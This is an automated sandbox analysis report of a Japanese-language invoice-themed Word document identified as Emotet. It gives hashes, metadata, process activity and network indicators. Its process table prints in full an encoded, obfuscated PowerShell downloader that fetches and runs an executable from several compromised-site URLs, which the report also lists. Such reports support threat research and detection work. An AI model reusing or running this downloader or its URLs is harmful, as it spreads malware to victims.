File name: | 1614_202008 ご入金額の通知・ご請求書発行のお願い.doc |
Full analysis: | https://app.any.run/tasks/4353de91-c659-4d67-9a7d-b6e429088696 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 30, 2020, 08:57:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestiae., Author: Alicia Blanchard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Aug 27 23:37:00 2020, Last Saved Time/Date: Thu Aug 27 23:37:00 2020, Number of Pages: 1, Number of Words: 5, Number of Characters: 29, Security: 0 |
MD5: | CA15F9F45971EA442943084547761994 |
SHA1: | F4134B9DF06C604BEF7619DB66500DF2684AE000 |
SHA256: | A02A8AD984B702BCF392E49FC099D28BB09A1FB57ACC50FE3F090678F3FEF082 |
SSDEEP: | 3072:C6Yy0u8YGgjv+ZvchmkHcI/o1/Vb6//////////////////////////////////Y:CC0uXnWFchmmcI/o1/+Qswayp |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Molestiae. |
---|---|
Subject: | - |
Author: | Alicia Blanchard |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:08:27 22:37:00 |
ModifyDate: | 2020:08:27 22:37:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 29 |
Security: | None |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 33 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2136 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1614_202008 ご入金額の通知・ご請求書発行のお願い.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2792 | powersheLL -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAEUAYwBUAE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AHIAaQB0AGAAeQBwAHIAYABPAHQAYABvAEMATwBMACIAIAA9ACAAKAAnAHQAJwArACgAJwBsAHMAJwArACcAMQAnACkAKwAnADIALAAnACsAKAAnACAAdABsAHMAJwArACcAMQAxACwAJwApACsAKAAnACAAJwArACcAdABsAHMAJwApACkAOwAkAFEAMABrADkAdABtAG0AIAA9ACAAKAAnAFcAdwAnACsAJwAxAHUAJwArACgAJwBjACcAKwAnAHoAcwB3ACcAKQApADsAJABUAHkAZgBnAGMAaABkAD0AKAAoACcATQAnACsAJwBrAGYAJwApACsAKAAnAHQAMQBkACcAKwAnADUAJwApACkAOwAkAE8ANwBzAHAAdQAxAG4APQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAoACcANwBZACcAKwAnAHQAdwAnACkAKwAoACcAbwByACcAKwAnAGQANwBZACcAKQArACgAJwB0ACcAKwAnADIAMAAnACkAKwAnADEAOQAnACsAKAAnADcAWQAnACsAJwB0ACcAKQApAC0AQwBSAEUAcABMAEEAQwBFACAAIAAoACcANwAnACsAJwBZAHQAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKwAkAFEAMABrADkAdABtAG0AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFMAMQBqADEAMAB2ADYAPQAoACcAVABkACcAKwAoACcAOAB3ACcAKwAnADQAcAByACcAKQApADsAJABPAGcAMQBrAHEAdgBlAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAFcAZQBiAGMATABpAGUATgB0ADsAJABJADEAbQBrAGQAcgBfAD0AKAAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwA6ACcAKQArACcALwAnACsAJwAvACcAKwAoACcAcgAnACsAJwBpAGMAawAnACsAJwB0AGgAJwApACsAJwBlACcAKwAoACcAdwBlACcAKwAnAGwAJwApACsAKAAnAGQAZQAnACsAJwByAC4AYwAnACsAJwBvAG0ALwAnACkAKwAnAGQAJwArACcAdAAnACsAJwBiACcAKwAnAGsAdQAnACsAJwBwADIAJwArACgAJwAwADEAMQAwACcAKwAnADIAJwArACcAMAAnACkAKwAoACcANQAnACsAJwAvAGkAJwApACsAJwAvACoAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwBzAGkAdAAnACsAJwBlACcAKQArACgAJwBjAGcAJwArACcAcABzACcAKQArACgAJwAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAvAGMAJwArACcAZwBpAC0AYgAnACsAJwBpAG4AJwApACsAKAAnAC8ANwAvACcAKwAnACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvAC8AJwArACcAdABmACcAKQArACgAJwBiAGEAdQByAHUALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALgAnACkAKwAoACcAYgAnACsAJwByAC8AYwAnACkAKwAoACcAZwAnACsAJwBpACcAKwAnAC0AYgBpACcAKwAnAG4ALwBMAGgAZQAnACkAKwAoACcALwAqACcAKwAnAGgAdAAnACkAKwAnAHQAcAAnACsAJwBzADoAJwArACgAJwAvAC8AcAAnACsAJwBhAHUAbABiAHUAcgAnACkAKwAoACcAawBwAGgAbwAnACsAJwB0ACcAKQArACgAJwBvAGcAJwArACcAcgBhACcAKQArACgAJwBwACcAKwAnAGgAeQAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvAF8AJwArACcAbgBlAHcAJwApACsAKAAnAF8AJwArACcAaQBtAGEAJwApACsAJwBnAGUAJwArACcAcwAnACsAJwAvACcAKwAoACcARgAvACoAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwB0AGgAZQBlACcAKwAnAGwAJwArACcAZAAnACkAKwAnAGUAJwArACcAcwAnACsAKAAnAHQAZwBlAGUAawAnACsAJwAuAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGUAcgByAG8AJwApACsAJwByACcAKwAnAC8AJwArACgAJwBGAFMALwAnACsAJwAqAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwA6ACcAKwAnAC8ALwAnACsAJwB1ACcAKwAoACcAbgBpAHEAJwArACcAdQBlACcAKQArACgAJwB3AHYALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAnAGMAJwArACgAJwBnAGkALQBiAGkAJwArACcAbgAnACsAJwAvAE8AVgBKACcAKQArACgAJwA5ACcAKwAnAHEAWQAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAOgAvAC8AdAB1ACcAKwAnAGwAcwAuACcAKwAnAHAAbAAvAGMAZwAnACsAJwBpAC0AJwArACcAYgBpAG4AJwApACsAJwAvADcAJwArACgAJwBhACcAKwAnADkALwAnACkAKQAuACIAUwBwAGwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABYAGoAaQBjADMAeAB4AD0AKAAnAFgAJwArACgAJwBhAHMAJwArACcAcgAnACkAKwAoACcAbQAnACsAJwBhAGUAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABMADIAOQByADQAYQBtACAAaQBuACAAJABJADEAbQBrAGQAcgBfACkAewB0AHIAeQB7ACQATwBnADEAawBxAHYAZQAuACIARABvAHcAbgBgAEwATwBgAEEARABGAGAAaQBsAEUAIgAoACQATAAyADkAcgA0AGEAbQAsACAAJABPADcAcwBwAHUAMQBuACkAOwAkAFgAdwBtADAAaQA3AHAAPQAoACgAJwBWAHkAJwArACcAbwAnACkAKwAoACcAXwAnACsAJwBsAHIAdwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABPADcAcwBwAHUAMQBuACkALgAiAGwAZQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAxADAAMgA3ACkAIAB7ACYAKAAnAEkAbgAnACsAJwB2AG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAE8ANwBzAHAAdQAxAG4AKQA7ACQAQQB4AHIANgAyAGcAZAA9ACgAKAAnAEUANQA5AGMAJwArACcAbgAnACkAKwAnAGUAMwAnACkAOwBiAHIAZQBhAGsAOwAkAEoAMQBoAGMAcwA4AGEAPQAoACgAJwBCAGoAJwArACcAZAAnACkAKwAnAGkAeQAnACsAJwAzAHAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAHkAbQBvAHkAegBmAD0AKAAoACcARwA3AGIAJwArACcAYwAnACkAKwAoACcAcgAnACsAJwBkAHIAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB1B2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFAC2EE0919521F179.TMP | — | |
MD5:— | SHA256:— | |||
2792 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4SU1I85OZ7B1TC4ATZTC.temp | — | |
MD5:— | SHA256:— | |||
2792 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:907C5FD303717561FE1B4EA4297DAC9A | SHA256:219788D162769A2E9475AF5337CA17B4D213A15ADE3E7F46F3FC02ADD48CD09D | |||
2792 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19c029.TMP | binary | |
MD5:907C5FD303717561FE1B4EA4297DAC9A | SHA256:219788D162769A2E9475AF5337CA17B4D213A15ADE3E7F46F3FC02ADD48CD09D | |||
2136 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:873065E64309224CB282A4A8A1ACBB91 | SHA256:37B9F0795B54CF0C8656DA0AF3F83083C626E94579EFF4C52675A5117589EBFC | |||
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:0DC85AA6CC7E2116604F4A5A3D961BE7 | SHA256:43BD818F79B3D655D35F82EAD36488683794C8AB1462CA3E585BB2277EA2CFE8 | |||
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$14_202008 ご入金額の通知・ご請求書発行のお願い.doc | pgc | |
MD5:E980C29A8BA05C5F6846C904B70FEC3F | SHA256:9ED725BEB2D9C525CB6B0F014F44AB401EF92A22DC0589E9D9F774D666268FF3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2792 | powersheLL.exe | GET | — | 158.106.138.177:80 | http://www.uniquewv.com/cgi-bin/OVJ9qY/ | US | — | — | unknown |
2792 | powersheLL.exe | GET | 301 | 158.106.138.177:80 | http://uniquewv.com/cgi-bin/OVJ9qY/ | US | — | — | unknown |
2792 | powersheLL.exe | GET | 403 | 74.96.241.34:80 | http://theeldestgeek.com/error/FS/ | US | html | 741 b | suspicious |
2792 | powersheLL.exe | GET | 404 | 108.60.15.59:80 | http://rickthewelder.com/dtbkup20110205/i/ | CA | html | 124 b | suspicious |
2792 | powersheLL.exe | GET | 404 | 162.241.88.184:80 | http://tfbauru.com.br/cgi-bin/Lhe/ | US | html | 315 b | suspicious |
2792 | powersheLL.exe | GET | 301 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9/ | unknown | html | 234 b | unknown |
2792 | powersheLL.exe | GET | 404 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9 | unknown | html | 1.52 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2792 | powersheLL.exe | 108.60.15.59:80 | rickthewelder.com | In2net Network Inc. | CA | suspicious |
2792 | powersheLL.exe | 174.136.37.108:80 | sitecgps.com | Colo4, LLC | US | unknown |
2792 | powersheLL.exe | 185.221.108.96:80 | tuls.pl | — | — | unknown |
2792 | powersheLL.exe | 162.241.88.184:80 | tfbauru.com.br | CyrusOne LLC | US | suspicious |
2792 | powersheLL.exe | 74.96.241.34:80 | theeldestgeek.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | suspicious |
2792 | powersheLL.exe | 64.90.34.152:443 | paulburkphotography.com | New Dream Network, LLC | US | unknown |
2792 | powersheLL.exe | 158.106.138.177:80 | uniquewv.com | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
rickthewelder.com |
| suspicious |
sitecgps.com |
| suspicious |
tfbauru.com.br |
| suspicious |
paulburkphotography.com |
| unknown |
theeldestgeek.com |
| suspicious |
uniquewv.com |
| unknown |
www.uniquewv.com |
| unknown |
tuls.pl |
| unknown |
dns.msftncsi.com |
| shared |